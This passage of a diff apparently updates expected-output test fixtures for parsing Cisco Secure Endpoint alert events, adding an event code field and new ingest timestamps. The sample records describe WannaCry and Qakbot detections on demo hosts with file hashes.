                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":426000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-95.SBX.TG\",\"detection_id\":\"6419303565650558978\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":768,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6419303565650559000",
@@ -4124,8 +4174,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:33.421007602Z",
+                "ingested": "2021-09-30T00:14:44.025318355Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":399000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-95.SBX.TG\",\"detection_id\":\"6419303565650558977\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":768,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6419303565650559000",
@@ -4193,11 +4244,12 @@
             },
             "event": {
                 "severity": 0,
-                "action": "Policy Update",
-                "ingested": "2021-09-27T00:41:33.421009360Z",
+                "ingested": "2021-09-30T00:14:44.025320596Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662859016176000,\"timestamp\":1610651432,\"timestamp_nanoseconds\":199000000,\"date\":\"2021-01-14T19:10:32+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}",
-                "id": "6412662859016176000",
-                "kind": "alert"
+                "code": "553648130",
+                "kind": "alert",
+                "action": "Policy Update",
+                "id": "6412662859016176000"
             },
             "cisco": {
                 "secure_endpoint": {
@@ -4248,11 +4300,12 @@
             },
             "event": {
                 "severity": 0,
-                "action": "Policy Update",
-                "ingested": "2021-09-27T00:41:33.421011122Z",
+                "ingested": "2021-09-30T00:14:44.025322840Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662854721208000,\"timestamp\":1610651431,\"timestamp_nanoseconds\":856000000,\"date\":\"2021-01-14T19:10:31+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}",
-                "id": "6412662854721208000",
-                "kind": "alert"
+                "code": "553648130",
+                "kind": "alert",
+                "action": "Policy Update",
+                "id": "6412662854721208000"
             },
             "cisco": {
                 "secure_endpoint": {
@@ -4311,8 +4364,9 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-27T00:41:33.421012882Z",
+                "ingested": "2021-09-30T00:14:44.025325035Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":233000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412662850426241035\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}",
+                "code": "2164260893",
                 "kind": "alert",
                 "action": "Retrospective Quarantine Attempt Failed",
                 "id": "6412662850426241000",
@@ -4386,8 +4440,9 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-27T00:41:33.421017406Z",
+                "ingested": "2021-09-30T00:14:44.025327285Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":218000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412662850426241034\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}",
+                "code": "2164260893",
                 "kind": "alert",
                 "action": "Retrospective Quarantine Attempt Failed",
                 "id": "6412662850426241000",
@@ -4461,8 +4516,9 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-27T00:41:33.421019409Z",
+                "ingested": "2021-09-30T00:14:44.025329483Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":218000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412662850426241033\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}",
+                "code": "2164260893",
                 "kind": "alert",
                 "action": "Retrospective Quarantine Attempt Failed",
                 "id": "6412662850426241000",
@@ -4542,8 +4598,9 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-27T00:41:33.421021176Z",
+                "ingested": "2021-09-30T00:14:44.025331697Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":218000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412662850426241035\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"el2j9fcqj.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\el2j9fcqj.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}",
+                "code": "553648147",
                 "kind": "alert",
                 "action": "Retrospective Detection",
                 "id": "6412662850426241000",
@@ -4621,8 +4678,9 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-27T00:41:33.421022930Z",
+                "ingested": "2021-09-30T00:14:44.025333936Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":218000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412662850426241034\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"kepv86368.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\kepv86368.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}",
+                "code": "553648147",
                 "kind": "alert",
                 "action": "Retrospective Detection",
                 "id": "6412662850426241000",
@@ -4700,8 +4758,9 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-27T00:41:33.421024669Z",
+                "ingested": "2021-09-30T00:14:44.025336406Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":218000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412662850426241033\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"uqlq0o884.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\uqlq0o884.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}",
+                "code": "553648147",
                 "kind": "alert",
                 "action": "Retrospective Detection",
                 "id": "6412662850426241000",
@@ -4773,8 +4832,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:33.421026417Z",
+                "ingested": "2021-09-30T00:14:44.025338670Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419281601187807000,\"timestamp\":1610647435,\"timestamp_nanoseconds\":891000000,\"date\":\"2021-01-14T18:03:55+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419281601187807332\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
+                "code": "2164260880",
                 "kind": "alert",
                 "action": "Quarantine Failure",
                 "id": "6419281601187807000",
@@ -4869,8 +4929,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:33.421028180Z",
+                "ingested": "2021-09-30T00:14:44.025366396Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419281601187807000,\"timestamp\":1610647435,\"timestamp_nanoseconds\":891000000,\"date\":\"2021-01-14T18:03:55+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-95.SBX.TG\",\"detection_id\":\"6419281601187807332\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6419281601187807000",
@@ -4971,8 +5032,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:33.421029920Z",
+                "ingested": "2021-09-30T00:14:44.025370523Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419281588302905000,\"timestamp\":1610647432,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T18:03:52+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419281588302905443\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6419281588302905000",
@@ -5048,8 +5110,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:33.421031681Z",
+                "ingested": "2021-09-30T00:14:44.025372836Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419281588302905000,\"timestamp\":1610647432,\"timestamp_nanoseconds\":927000000,\"date\":\"2021-01-14T18:03:52+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419281588302905443\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
+                "code": "553648143",
                 "kind": "alert",
                 "action": "Threat Quarantined",
                 "id": "6419281588302905000",
@@ -5119,8 +5182,9 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-27T00:41:33.421033406Z",
+                "ingested": "2021-09-30T00:14:44.025375107Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411538569722068995\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}",
+                "code": "2164260893",
                 "kind": "alert",
                 "action": "Retrospective Quarantine Attempt Failed",
                 "id": "6411538569722069000",
@@ -5194,8 +5258,9 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-27T00:41:33.421035144Z",
+                "ingested": "2021-09-30T00:14:44.025377372Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411538569722068994\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not 